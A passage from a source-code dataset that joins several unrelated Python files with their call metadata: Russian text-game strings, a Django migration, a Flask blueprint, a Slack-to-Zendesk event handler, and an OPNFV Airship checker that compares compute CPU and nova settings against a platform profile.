False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((674, 8, 674, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((676, 17, 676, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((694, 8, 694, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((696, 17, 696, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((711, 17, 711, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((724, 8, 724, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((726, 17, 726, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((744, 8, 744, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((746, 17, 746, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((297, 58, 297, 79), 'json.dumps', 'json.dumps', ({(297, 69, 297, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((320, 58, 320, 79), 'json.dumps', 'json.dumps', ({(320, 69, 320, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((579, 58, 579, 79), 'json.dumps', 'json.dumps', ({(579, 69, 579, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((632, 58, 632, 79), 'json.dumps', 'json.dumps', ({(632, 69, 632, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((683, 58, 683, 79), 'json.dumps', 'json.dumps', ({(683, 69, 683, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((733, 58, 733, 79), 'json.dumps', 'json.dumps', ({(733, 69, 733, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n')]
ProtKsen/pgame
texts.py
c4455c6c07eaf275f9fcfa661cd6933ee7b1ff92
"""Text parts.""" SEPARATOR = '----------------------------------' CONT_GAME = 'enter для продолжения игры' GREETING = 'Добро пожаловать в игру ''Сундук сокровищ''!\n' \ 'Попробуй себя в роли капитана корабля, собери ' \ 'команду и достань все сокровища!' NAME_QUESTION = 'Как тебя зовут?' CHOOSE_LEVEL = 'Выбери уровень сложности, он влияет на стоимость ' \ 'сокровищ на островах. \n' \ '1 - легко \n' \ '2 - средне \n' \ '3 - тяжело' INTRODUCTION = 'В наследство от дядюшки тебе достался корабль, \n' \ 'несколько золотых монет и карта, на которой \n' \ 'отмечены 10 островов. На каждом из островов \n' \ 'зарыт клад. Но для того, чтобы достать его, \n' \ 'необходимо обезвредить ловушку. Чем больше \n' \ 'порядковый номер острова, тем ценнее хранящееся \n' \ 'на нем сокровище и тем труднее его получить. \n\n' \ 'Цель игры - добыть все сокровища и скопить как можно больше монет. \n\n' \ 'Команда твоего корабля сможет обезвредить ловушку, \n' \ 'только если будет иметь нужное количество очков \n' \ 'логики, силы и ловкости. \n\n' \ '!!! Сумма всех требуемых очков равна номеру острова,\n' \ 'но точная комбинация тебе неизвестна. !!!' ORACLE_QUESTION = 'Здесь неподалеку живет известный оракул. За определенную\n' \ 'плату он сможет предсказать с какой ловушкой\n' \ 'ты столкнешься на острове. Пойдешь ли ты к нему?\n' \ '----------------------------------\n'\ '1 - да, пойду\n' \ '2 - нет, сам разберусь' ORACLE_QUESTION_1 = 'Что ты хочешь узнать у оракула? \n' \ '----------------------------------\n'\ '1 - я передумал, буду сам себе оракул! \n'\ '2 - сколько очков логики должно быть у команды? (1 монета) \n'\ '3 - сколько очков силы должно быть у команды? (1 монета) \n'\ '4 - сколько очков ловкости должно быть у команды? (1 монета) \n'\ '5 - узнать все требуемые характеристики (3 монеты)' ORACLE_QUESTION_2 = 'Что ты хочешь узнать у оракула? \n' \ '----------------------------------\n'\ '1 - я передумал, буду сам себе оракул! \n'\ '2 - сколько очков логики должно быть у команды? (1 монета) \n'\ '3 - сколько очков силы должно быть у команды? (1 монета) \n'\ '4 - сколько очков ловкости должно быть у команды? (1 монета)' GO_TAVERN_TEXT = 'Отлично! Для похода на остров тебе понадобится \n' \ 'команда, а нанять ее ты сможешь в таверне.' EXIT_QUESTION = 'Продолжить игру?\n' \ '----------------------------------\n'\ '1 - да\n' \ '2 - нет' SUCCESS_STEP = 'Поздравляю! Ты смог достать спрятанное сокровище! \n' \ 'Самое время готовиться к следующему походу.' FAILURE_STEP = 'К сожалению, ты не смог достать сокровище. \n' \ 'Если у тебя еще остались монеты, то можешь \n' \ 'попробовать организовать поход заново. Удачи!' WINNING = 'Поздравляю! Ты собрал сокровища со всех окрестных \n' \ 'островов, можешь выкинуть ненужную теперь карту) \n' \ 'Конец игры.' LOSING = 'Сожалею, ты потратил все деньги. Карьера пиратского \n' \ 'капитана подошла к концу. А дядюшка в тебя верил! \n' \ 'Конец игры.' NAMES = ['Боб', 'Ричард', 'Алан', 'Степан', 'Грозный Глаз', 'Гарри', 'Моррис', 'Джек', 'Алекс', 'Сэм', 'Том', 'Янис', 'Геральт', 'Ринсвинд', 'Купер', 'Борис', 'Джон', 'Рон']
[]
alerin345/Instagram-React
api/migrations/0001_initial.py
25dfbcbff2a2d050e4f2804a74cd7c901cd2cb66
# Generated by Django 3.1.3 on 2021-01-07 00:42 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Image', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.ImageField(null=True, upload_to='')), ('description', models.TextField(blank=True, default='')), ('likes', models.IntegerField(default=0)), ('comments', models.IntegerField(default=0)), ('date', models.DateTimeField(default=django.utils.timezone.now)), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)), ('userSubscribed', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='userSubscribed', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Profile', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.ImageField(blank=True, default='default.png', null=True, upload_to='')), ('description', models.TextField(blank=True, default='')), ('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Like', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('value', models.TextField()), ('date', models.DateTimeField(default=django.utils.timezone.now)), ('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.AddConstraint( model_name='subscription', constraint=models.UniqueConstraint(fields=('user', 'userSubscribed'), name='unique subscribes'), ), migrations.AddConstraint( model_name='like', constraint=models.UniqueConstraint(fields=('image', 'user'), name='unique likes'), ), ]
[((14, 8, 14, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(14, 40, 14, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((67, 23, 67, 107), 'django.db.models.UniqueConstraint', 'models.UniqueConstraint', (), '', False, 'from django.db import migrations, models\n'), ((71, 23, 71, 93), 'django.db.models.UniqueConstraint', 'models.UniqueConstraint', (), '', False, 'from django.db import migrations, models\n'), ((21, 23, 21, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((22, 28, 22, 70), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((23, 32, 23, 72), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((24, 26, 24, 56), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((25, 29, 25, 59), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((26, 25, 26, 80), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((27, 25, 27, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((33, 23, 33, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((34, 25, 34, 148), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((35, 35, 35, 168), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((41, 23, 41, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((42, 28, 42, 105), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((43, 32, 43, 72), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((44, 25, 44, 130), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import migrations, models\n'), ((50, 23, 50, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((51, 26, 51, 115), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((52, 25, 52, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((58, 23, 58, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((59, 26, 59, 44), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((60, 25, 60, 80), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((61, 26, 61, 115), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((62, 25, 62, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')]
KiraPC/fastapi-router-controller
fastapi_router_controller/lib/controller_loader.py
e105701ebce2e03a0e00ac182c10941daf1b7e22
import os import importlib class ControllerLoader: """ The ControllerLoader class. """ @staticmethod def load(directory, package): """ It is an utility to load automatically all the python module presents on a given directory """ for module in os.listdir(directory): sub_dir = directory + "/" + module if os.path.isdir(sub_dir): ControllerLoader.load(sub_dir, "{}.{}".format(package, module)) if module == "__init__.py" or module[-3:] != ".py": continue else: module_import_name = "{}.{}".format(package, module[:-3]) importlib.import_module(module_import_name)
[((16, 22, 16, 43), 'os.listdir', 'os.listdir', ({(16, 33, 16, 42): 'directory'}, {}), '(directory)', False, 'import os\n'), ((18, 15, 18, 37), 'os.path.isdir', 'os.path.isdir', ({(18, 29, 18, 36): 'sub_dir'}, {}), '(sub_dir)', False, 'import os\n'), ((24, 16, 24, 59), 'importlib.import_module', 'importlib.import_module', ({(24, 40, 24, 58): 'module_import_name'}, {}), '(module_import_name)', False, 'import importlib\n')]
VikrantReddy/Instagram2Shop
app/mod_ecomm/controllers.py
8d9c3f39d277fafb56d10a87a1b62a6df8a74237
from flask import Blueprint, Flask, send_from_directory from werkzeug.security import check_password_hash, generate_password_hash from app import db from app.mod_auth.forms import LoginForm from app.mod_auth.models import User mod_ecomm = Blueprint('products', __name__, url_prefix='/products', static_folder='../../frontend/build') @mod_ecomm.route("/", defaults={'path': ''}) def serve(path): if path: return send_from_directory(mod_ecomm.static_folder, path) else: return send_from_directory(mod_ecomm.static_folder, 'index.html')
[((8, 12, 9, 59), 'flask.Blueprint', 'Blueprint', (), '', False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((15, 15, 15, 65), 'flask.send_from_directory', 'send_from_directory', ({(15, 35, 15, 58): 'mod_ecomm.static_folder', (15, 60, 15, 64): 'path'}, {}), '(mod_ecomm.static_folder, path)', False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((17, 15, 17, 73), 'flask.send_from_directory', 'send_from_directory', ({(17, 35, 17, 58): 'mod_ecomm.static_folder', (17, 60, 17, 72): '"""index.html"""'}, {}), "(mod_ecomm.static_folder, 'index.html')", False, 'from flask import Blueprint, Flask, send_from_directory\n')]
phillmac/dagr_selenium
dagr_selenium/crawl_watchlist.py
b7417a878fe4c171625a40e746113ae2c0222335
from .functions import monitor_watchlist_action, manager with manager.get_dagr(): monitor_watchlist_action()
[]
uktrade/zenslackchat
zenslackchat/eventsview.py
8071757e1ea20a433783c6a7c47f25b046692682
import pprint import logging from django.conf import settings from rest_framework import status from rest_framework.views import APIView from rest_framework.response import Response from zenslackchat.message import handler from zenslackchat.models import SlackApp from zenslackchat.models import ZendeskApp class Events(APIView): """Handle Events using the webapp instead of using the RTM API. This is handy as i don't need to run a specifc bot process just to handle events. Instead I can just using the webapp REST API for this. Handy documentation for Slack events: https://api.slack.com/events-api The app needs to subscribe to events to receive them. From https://api.slack.com/apps/<APP ID>/event-subscriptions you need to: - Enable Events from "Off" to "On" - Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/ - Then "Subscribe to events on behalf of users" - Click "Add Workspace Event" and add "message.channels". Message on channels will now start being recieved. The bot will need to be invited to a channel first. """ def post(self, request, *args, **kwargs): """Events will come in over a POST request. """ log = logging.getLogger(__name__) slack_message = request.data if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN: log.error("Slack message verification failed!") return Response(status=status.HTTP_403_FORBIDDEN) # verification challenge, convert to signature verification instead: if slack_message.get('type') == 'url_verification': return Response(data=slack_message, status=status.HTTP_200_OK) if 'event' in slack_message: event = slack_message.get('event') if settings.DEBUG: log.debug(f'event received:\n{pprint.pformat(event)}\n') try: handler( event, our_channel=settings.SRE_SUPPORT_CHANNEL, slack_client=SlackApp.client(), zendesk_client=ZendeskApp.client(), workspace_uri=settings.SLACK_WORKSPACE_URI, zendesk_uri=settings.ZENDESK_TICKET_URI, user_id=settings.ZENDESK_USER_ID, group_id=settings.ZENDESK_GROUP_ID, ) except: # noqa # I want all event even if they cause me problems. If I don't # accept the webhook will be marked as broken and then no more # events will be sent. log.exception("Slack message_handler error: ") return Response(status=status.HTTP_200_OK)
[((37, 14, 37, 41), 'logging.getLogger', 'logging.getLogger', ({(37, 32, 37, 40): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((71, 15, 71, 50), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((43, 19, 43, 61), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((47, 19, 47, 74), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((57, 33, 57, 50), 'zenslackchat.models.SlackApp.client', 'SlackApp.client', ({}, {}), '()', False, 'from zenslackchat.models import SlackApp\n'), ((58, 35, 58, 54), 'zenslackchat.models.ZendeskApp.client', 'ZendeskApp.client', ({}, {}), '()', False, 'from zenslackchat.models import ZendeskApp\n'), ((52, 46, 52, 67), 'pprint.pformat', 'pprint.pformat', ({(52, 61, 52, 66): 'event'}, {}), '(event)', False, 'import pprint\n')]
opnfv/cirv-sdv
sdv/docker/sdvstate/internal/validator/airship/compute_check.py
31fb310d3fd1c9c1f12cfe0c654870e24f5efab6
# Copyright 2020 University Of Delhi. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Compute Related Checks """ import configparser import json import re import logging from tools.kube_utils import kube_exec, get_pod_with_labels from tools.conf import settings from internal import store_result ########### # Checks ########### def isolated_cores_check(): """ isolated_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_isolated_cores() required_value = required_isolated_cores() result = {'category': 'compute', 'case_name': 'isolated_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def reserved_vnf_cores_check(): """ reserved_vnf_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_reserved_vnf_cores() required_value = required_reserved_vnf_cores() result = {'category': 'compute', 'case_name': 'reserved_vnf_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def vswitch_pmd_cores_check(): """ vswitch_pmd_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_vswitch_pmd_cores() required_value = required_vswitch_pmd_cores() result = {'category': 'compute', 'case_name': 'vswitch_pmd_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def vswitch_dpdk_lcores_check(): """ vswitch_dpdk_lcores_check """ logger = logging.getLogger(__name__) traced_value = trace_vswitch_dpdk_lcores() required_value = required_vswitch_dpdk_lcores() result = {'category': 'compute', 'case_name': 'vswitch_dpdk_lcores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def os_reserved_cores_check(): """ os_reserved_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_os_reserved_cores() required_value = required_os_reserved_cores() result = {'category': 'compute', 'case_name': 'os_reserved_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def nova_scheduler_filters_check(): """ nova_scheduler_filters_check """ logger = logging.getLogger(__name__) traced_value = trace_nova_scheduler_filters() required_value = required_nova_scheduler_filters() result = {'category': 'compute', 'case_name': 'nova_scheduler_filters_check', 'details': {'traced_filters': traced_value, 'required_filters': required_value } } if are_lists_equal(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def cpu_allocation_ratio_check(): """ cpu_allocation_ratio_check """ logger = logging.getLogger(__name__) traced_value = trace_cpu_allocation_ratio() required_value = required_cpu_allocation_ratio() result = {'category': 'compute', 'case_name': 'cpu_allocation_ratio_check', 'details': {'traced_ratio': traced_value, 'required_ratio': required_value } } if traced_value == required_value: result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result ############### # helper functions ############### def trace_isolated_cores(): """ Trace isolated_cores from Airship deployment :return: value traced from `isolcpus` key in `/proc/cmdline` """ pod = get_pod_with_labels('application=nova,component=compute') cmd = ['cat', '/proc/cmdline'] proc_cmd = kube_exec(pod, cmd) for option in proc_cmd.split(): if 'isolcpus' in option: _, isolcpus_value = split_key_value(option) break return isolcpus_value def required_isolated_cores(): """ Returns value of `isolated_cpus` from platform_profile used by Role for worker nodes in PDF :return: isolated_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['isolated_cpus'] def trace_reserved_vnf_cores(): """ Trace vnf_reserved_cores from Airship deployment :return: value traced from `vcpu_pin_set` key in nova.conf of actual deployment """ try: config = get_nova_conf() vcpu_pin_set = config.get('DEFAULT', 'vcpu_pin_set') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): vcpu_pin_set = '' return vcpu_pin_set def required_reserved_vnf_cores(): """ Returns value of vnf_cores from platform_profile used by Role for worker nodes in PDF :return: vnf_reserverd_core value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vnf_cores'] def trace_vswitch_pmd_cores(): """ Trace vswitch_pmd_cores from Airship deployment :return: value traced from `other_config:pmd-cpu-mask` in openvswitchdb using ovs-vsctl """ ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd') cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config'] response = kube_exec(ovs_pod, cmd) # convert config str to json str match = re.findall("[a-zA-Z0-9-]+=", response) for key in match: response = response.replace(key, '"' + key[:-1] + '":') match = re.findall(":[a-zA-Z0-9-]+", response) for key in match: response = response.replace(key[1:], '"' + key[1:] + '"') config = json.loads(response) if 'pmd-cpu-mask' in config: pmd_cores = hex_to_comma_list(config['pmd-cpu-mask']) else: pmd_cores = '' return pmd_cores def required_vswitch_pmd_cores(): """ Returns value of vswitch_pmd_cores from platform_profile used by Role for worker nodes in PDF :return: vswitch_pmd_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vswitch_pmd_cores'] def trace_vswitch_dpdk_lcores(): """ Trace vswitch_dpdk_lcores from Airship deployment :return: value traced from `other_config:dpdk-lcore-mask` in openvswitchdb using ovs-vsctl """ ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd') cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config'] response = kube_exec(ovs_pod, cmd) # convert config str to json str match = re.findall("[a-zA-Z0-9-]+=", response) for key in match: response = response.replace(key, '"' + key[:-1] + '":') match = re.findall(":[a-zA-Z0-9-]+", response) for key in match: response = response.replace(key[1:], '"' + key[1:] + '"') config = json.loads(response) if 'dpdk-lcore-mask' in config: pmd_cores = hex_to_comma_list(config['dpdk-lcore-mask']) else: pmd_cores = '' return pmd_cores def required_vswitch_dpdk_lcores(): """ Returns value of vswitch_dpdk_lcores from platform_profile used by Role for worker nodes in PDF :return: vswitch_dpdk_lcores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vswitch_dpdk_lcores'] def trace_os_reserved_cores(): """ Trace os_reserved_cores from Airship deployment os_reserved_cores = all_cores - (reserved_vnf_cores + vswitch_pmd_cores + vswitch_dpdk_lcores) """ worker_role = settings.getValue('WORKER_ROLE_NAME') all_cores = get_cores_by_role(worker_role) reserved_vnf_cores = trace_reserved_vnf_cores() vswitch_pmd_cores = trace_vswitch_pmd_cores() vswitch_dpdk_lcores = trace_vswitch_dpdk_lcores() non_os_cores = [] non_os_cores.extend(convert_range_to_list(reserved_vnf_cores)) non_os_cores.extend(convert_range_to_list(vswitch_pmd_cores)) non_os_cores.extend(convert_range_to_list(vswitch_dpdk_lcores)) os_reserved_cores = set(all_cores).difference(set(non_os_cores)) # return as string with comma separated value return ','.join(map(str, list(os_reserved_cores))) def required_os_reserved_cores(): """ Returns value of os_reserved_cores from platform_profile used by Role for worker nodes in PDF :return: os_reserved_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['os_reserved_cores'] def trace_nova_scheduler_filters(): """ Trace scheduler_filters from Airship deployment :return: value traced from `enabled_filters` key in nova.conf of actual deployment """ try: config = get_nova_conf() filters = config.get('filter_scheduler', 'enabled_filters') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): filters = '' filters = filters.split(',') map(str.strip, filters) return filters def required_nova_scheduler_filters(): """ Required nova scheduler_filters by the PDF """ pdf = settings.getValue('pdf_file') filters = pdf['vim_functional']['scheduler_filters'] filters = filters.split(',') map(str.strip, filters) return filters def trace_cpu_allocation_ratio(): """ Trace cpu_allocation_ratio from Airship deployment :return: value traced from `cpu_allocation_ratio` key in nova.conf of actual deployment """ try: config = get_nova_conf() cpu_allocation_ratio = config.get('DEFAULT', 'cpu_allocation_ratio') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): cpu_allocation_ratio = '' return float(cpu_allocation_ratio) def required_cpu_allocation_ratio(): """ Required cpu_allocation_ratio by the PDF """ pdf = settings.getValue('pdf_file') cpu_allocation_ratio = pdf['vim_functional']['cpu_allocation_ratio'] return float(cpu_allocation_ratio) def get_role(role_name): """ Searches and returns role with `role_name` """ roles = settings.getValue('pdf_file')['roles'] for role in roles: if role['name'] == role_name: role_details = role return role_details def get_platform_profile(profile_name): """ Searches and returns platform_profile with `profile_name` """ platform_profiles = settings.getValue('pdf_file')['platform_profiles'] for profile in platform_profiles: if profile['profile_name'] == profile_name: profile_details = profile return profile_details def get_processor_profile(profile_name): """ Searches and returns processor_profile with `profile_name` """ processor_profiles = settings.getValue('pdf_file')['processor_profiles'] for profile in processor_profiles: if profile['profile_name'] == profile_name: profile_details = profile return profile_details def get_platform_profile_by_role(role_name): """ Returns platform profile details of a role """ role = get_role(role_name) profile = get_platform_profile(role['platform_profile']) return profile def get_hardware_profile_by_role(role_name): """ Returns hardware profile details of a role """ role = get_role(role_name) hardware_profiles = settings.getValue('pdf_file')['hardware_profiles'] for profile in hardware_profiles: if profile['profile_name'] == role['hardware_profile']: profile_details = profile return profile_details def get_cores_by_role(role_name): """ Returns cpu cores list of server hardware used in the role """ hardware_profile = get_hardware_profile_by_role(role_name) processor_profile = hardware_profile['profile_info']['processor_profile'] profile = get_processor_profile(processor_profile) cpus = [] for numa in profile['profile_info']['numas']: cpus.extend(convert_range_to_list(numa['cpu_set'])) return cpus def get_nova_conf(): """ Returns parsed nova.conf """ pod = get_pod_with_labels('application=nova,component=compute') cmd = ['cat', '/etc/nova/nova.conf'] response = kube_exec(pod, cmd) config = configparser.ConfigParser() config.read_string(response) return config ### cpu cores related helper function def convert_range_to_list(x): """ Returns list of numbers from given range as string e.g.: convert_range_to_list('3-5') will give [3, 4, 5] """ # pylint: disable=C0103 result = [] for part in x.split(','): if '-' in part: a, b = part.split('-') a, b = int(a), int(b) result.extend(range(a, b + 1)) elif part != '': a = int(part) result.append(a) # remove duplicates result = list(dict.fromkeys(result)) return result def is_ranges_equals(range1, range2): """ Checks whether two ranges passed as string are equal e.g.: is_ranges_equals('2-5', '2-4,5') returns true """ set1 = set(convert_range_to_list(range1)) set2 = set(convert_range_to_list(range2)) return set1 == set2 def are_lists_equal(list1, list2): """ Checks whether two list are identicals """ set1 = set(list1) set2 = set(list2) return set1 == set2 def hex_to_comma_list(hex_mask): """ Converts CPU mask given in hex to list of cores """ binary = bin(int(hex_mask, 16))[2:] reversed_binary = binary[::-1] i = 0 output = "" for bit in reversed_binary: if bit == '1': output = output + str(i) + ',' i = i + 1 return output[:-1] def comma_list_to_hex(cpus): """ Converts a list of cpu cores in corresponding hex value of cpu-mask """ cpu_arr = cpus.split(",") binary_mask = 0 for cpu in cpu_arr: binary_mask = binary_mask | (1 << int(cpu)) return format(binary_mask, '02x') def split_key_value(key_value_str, delimiter='='): """ splits given string into key and value based on delimiter :param key_value_str: example string `someKey=somevalue` :param delimiter: default delimiter is `=` :return: [ key, value] """ key, value = key_value_str.split(delimiter) key = key.strip() value = value.strip() return key, value
[((37, 13, 37, 40), 'logging.getLogger', 'logging.getLogger', ({(37, 31, 37, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((54, 4, 54, 32), 'internal.store_result', 'store_result', ({(54, 17, 54, 23): 'logger', (54, 25, 54, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((63, 13, 63, 40), 'logging.getLogger', 'logging.getLogger', ({(63, 31, 63, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((80, 4, 80, 32), 'internal.store_result', 'store_result', ({(80, 17, 80, 23): 'logger', (80, 25, 80, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((89, 13, 89, 40), 'logging.getLogger', 'logging.getLogger', ({(89, 31, 89, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((106, 4, 106, 32), 'internal.store_result', 'store_result', ({(106, 17, 106, 23): 'logger', (106, 25, 106, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((115, 13, 115, 40), 'logging.getLogger', 'logging.getLogger', ({(115, 31, 115, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((132, 4, 132, 32), 'internal.store_result', 'store_result', ({(132, 17, 132, 23): 'logger', (132, 25, 132, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((141, 13, 141, 40), 'logging.getLogger', 'logging.getLogger', ({(141, 31, 141, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((158, 4, 158, 32), 'internal.store_result', 'store_result', ({(158, 17, 158, 23): 'logger', (158, 25, 158, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((167, 13, 167, 40), 'logging.getLogger', 'logging.getLogger', ({(167, 31, 167, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((183, 4, 183, 32), 'internal.store_result', 'store_result', ({(183, 17, 183, 23): 'logger', (183, 25, 183, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((192, 13, 192, 40), 'logging.getLogger', 'logging.getLogger', ({(192, 31, 192, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((208, 4, 208, 32), 'internal.store_result', 'store_result', 